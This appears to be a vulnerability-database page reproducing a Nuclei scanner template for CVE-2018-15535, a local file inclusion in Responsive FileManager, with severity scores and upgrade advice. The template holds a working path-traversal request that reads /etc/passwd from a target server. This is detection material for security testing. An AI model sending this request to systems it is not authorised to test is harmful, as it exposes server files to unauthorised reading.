Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-15535
HistorySep 09, 2021 - 12:48 p.m.

Responsive FileManager <9.13.4 - Local File Inclusion

2021-09-0912:48:08
ProjectDiscovery
github.com
24

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.969 High

EPSS

Percentile

99.7%

Responsive FileManager before version 9.13.4 is vulnerable to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory, aka local file inclusion.

id: CVE-2018-15535

info:
  name: Responsive FileManager <9.13.4 - Local File Inclusion
  author: daffainfo
  severity: high
  description: Responsive FileManager before version 9.13.4 is vulnerable to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory, aka local file inclusion.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Upgrade to Responsive FileManager version 9.13.4 or later to fix the vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/45271
    - https://nvd.nist.gov/vuln/detail/CVE-2018-15535
    - http://seclists.org/fulldisclosure/2018/Aug/34
    - https://www.exploit-db.com/exploits/45271/
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-15535
    cwe-id: CWE-22
    epss-score: 0.9704
    epss-percentile: 0.99756
    cpe: cpe:2.3:a:tecrail:responsive_filemanager:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: tecrail
    product: responsive_filemanager
  tags: cve,cve2018,lfi,edb,seclists,tecrail

http:
  - method: GET
    path:
      - "{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100fc45ca6bc462dfa12f3816a1d91516eb665c5c4890cbdc399651e65cb9d55488022100bc6fa04ba3a8224f267355833878b5b57b1da1a0cc82659bf3019b7aa6bd7c80:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.969 High

EPSS

Percentile

99.7%